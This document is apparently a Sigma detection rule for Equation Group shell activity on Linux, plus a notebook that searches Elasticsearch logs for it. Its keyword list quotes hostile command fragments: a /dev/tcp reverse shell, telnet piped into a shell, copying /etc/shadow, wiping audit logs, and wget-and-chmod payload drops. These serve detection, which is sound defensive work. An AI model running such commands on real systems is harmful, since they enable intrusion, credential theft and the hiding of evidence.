Equation Group Indicators

Detects suspicious shell commands used in various Equation Group scripts and tools

Rule Content

- title: Equation Group Indicators
  id: 41e5c73d-9983-4b69-bd03-e13b67e9623c
  description: Detects suspicious shell commands used in various Equation Group scripts
    and tools
  references:
  - https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1
  tags:
  - attack.execution
  - attack.g0020
  - attack.t1059
  author: Florian Roth
  logsource:
    product: linux
    service: null
    category: null
  detection:
    keywords:
    - 'chown root*chmod 4777 '
    - cp /bin/sh .;chown
    - chmod 4777 /tmp/.scsi/dev/bin/gsh
    - chown root:root /tmp/.scsi/dev/bin/
    - chown root:root x;
    - /bin/telnet locip locport < /dev/console | /bin/sh
    - /tmp/ratload
    - 'ewok -t '
    - 'xspy -display '
    - cat > /dev/tcp/127.0.0.1/80 <<END
    - rm -f /current/tmp/ftshell.latest
    - 'ghost_* -v '
    - ' --wipe > /dev/null'
    - ping -c 2 *; grep * /proc/net/arp >/tmp/gx
    - iptables * OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP;
    - '> /var/log/audit/audit.log; rm -f .'
    - cp /var/log/audit/audit.log .tmp
    - sh >/dev/tcp/* <&1 2>&1
    - ncat -vv -l -p * <
    - nc -vv -l -p * <
    - < /dev/console | uudecode && uncompress
    - sendmail -osendmail;chmod +x sendmail
    - /usr/bin/wget -O /tmp/a http* && chmod 755 /tmp/cron
    - chmod 666 /var/run/utmp~
    - chmod 700 nscd crond
    - cp /etc/shadow /tmp/.
    - </dev/console |uudecode > /dev/null 2>&1 && uncompress
    - chmod 700 jp&&netstat -an|grep
    - uudecode > /dev/null 2>&1 && uncompress -f * && chmod 755
    - chmod 700 crond
    - wget http*; chmod +x /tmp/sendmail
    - chmod 700 fp sendmail pt
    - chmod 755 /usr/vmsys/bin/pipe
    - chmod -R 755 /usr/vmsys
    - chmod 755 $opbin/*tunnel
    - chmod 700 sendmail
    - chmod 0700 sendmail
    - /usr/bin/wget http*sendmail;chmod +x sendmail;
    - '&& telnet * 2>&1 </dev/console'
    condition: keywords
  falsepositives:
  - Unknown
  level: high

Querying Elasticsearch

Import Libraries


In [ ]:
from elasticsearch import Elasticsearch
from elasticsearch_dsl import Search
import pandas as pd

Initialize Elasticsearch client


In [ ]:
# HELK's Elasticsearch endpoint; change the host and port for another deployment
es = Elasticsearch(['http://helk-elasticsearch:9200'])
# Search every logs-* index; doc_type is the mapping type used by HELK's indices and
# is no longer needed on Elasticsearch 7+, which removed mapping types
searchContext = Search(using=es, index='logs-*', doc_type='doc')

Run Elasticsearch Query


In [ ]:
# Sigma es-qs output: each rule keyword becomes a *wildcard* term searched across every
# .keyword field. Reserved characters are backslash-escaped; '<' and '>' are dropped
# because query_string cannot escape them. A raw string keeps the backslashes intact.
s = searchContext.query('query_string', query=r'\*.keyword:(*chown\ root*chmod\ 4777\ * OR *cp\ \/bin\/sh\ .;chown* OR *chmod\ 4777\ \/tmp\/.scsi\/dev\/bin\/gsh* OR *chown\ root\:root\ \/tmp\/.scsi\/dev\/bin\/* OR *chown\ root\:root\ x;* OR *\/bin\/telnet\ locip\ locport\ \ \/dev\/console\ |\ \/bin\/sh* OR *\/tmp\/ratload* OR *ewok\ \-t\ * OR *xspy\ \-display\ * OR *cat\ \ \/dev\/tcp\/127.0.0.1\/80\ END* OR *rm\ \-f\ \/current\/tmp\/ftshell.latest* OR *ghost_*\ \-v\ * OR *\ \-\-wipe\ \ \/dev\/null* OR *ping\ \-c\ 2\ *;\ grep\ *\ \/proc\/net\/arp\ \/tmp\/gx* OR *iptables\ *\ OUTPUT\ \-p\ tcp\ \-d\ 127.0.0.1\ \-\-tcp\-flags\ RST\ RST\ \-j\ DROP;* OR *\ \/var\/log\/audit\/audit.log;\ rm\ \-f\ .* OR *cp\ \/var\/log\/audit\/audit.log\ .tmp* OR *sh\ \/dev\/tcp\/*\ &1\ 2&1* OR *ncat\ \-vv\ \-l\ \-p\ *\ * OR *nc\ \-vv\ \-l\ \-p\ *\ * OR *\ \/dev\/console\ |\ uudecode\ \&&\ uncompress* OR *sendmail\ \-osendmail;chmod\ \+x\ sendmail* OR *\/usr\/bin\/wget\ \-O\ \/tmp\/a\ http*\ \&&\ chmod\ 755\ \/tmp\/cron* OR *chmod\ 666\ \/var\/run\/utmp\~* OR *chmod\ 700\ nscd\ crond* OR *cp\ \/etc\/shadow\ \/tmp\/.* OR *\/dev\/console\ |uudecode\ \ \/dev\/null\ 2&1\ \&&\ uncompress* OR *chmod\ 700\ jp\&&netstat\ \-an|grep* OR *uudecode\ \ \/dev\/null\ 2&1\ \&&\ uncompress\ \-f\ *\ \&&\ chmod\ 755* OR *chmod\ 700\ crond* OR *wget\ http*;\ chmod\ \+x\ \/tmp\/sendmail* OR *chmod\ 700\ fp\ sendmail\ pt* OR *chmod\ 755\ \/usr\/vmsys\/bin\/pipe* OR *chmod\ \-R\ 755\ \/usr\/vmsys* OR *chmod\ 755\ $opbin\/*tunnel* OR *chmod\ 700\ sendmail* OR *chmod\ 0700\ sendmail* OR *\/usr\/bin\/wget\ http*sendmail;chmod\ \+x\ sendmail;* OR *\&&\ telnet\ *\ 2&1\ \/dev\/console*)')
response = s.execute()
df = pd.DataFrame()  # empty frame if the query fails, so df.head() below still works
if response.success():
    # scan() pages through every hit instead of the first page returned by execute()
    df = pd.DataFrame((d.to_dict() for d in s.scan()))

Show Results


In [ ]:
df.head()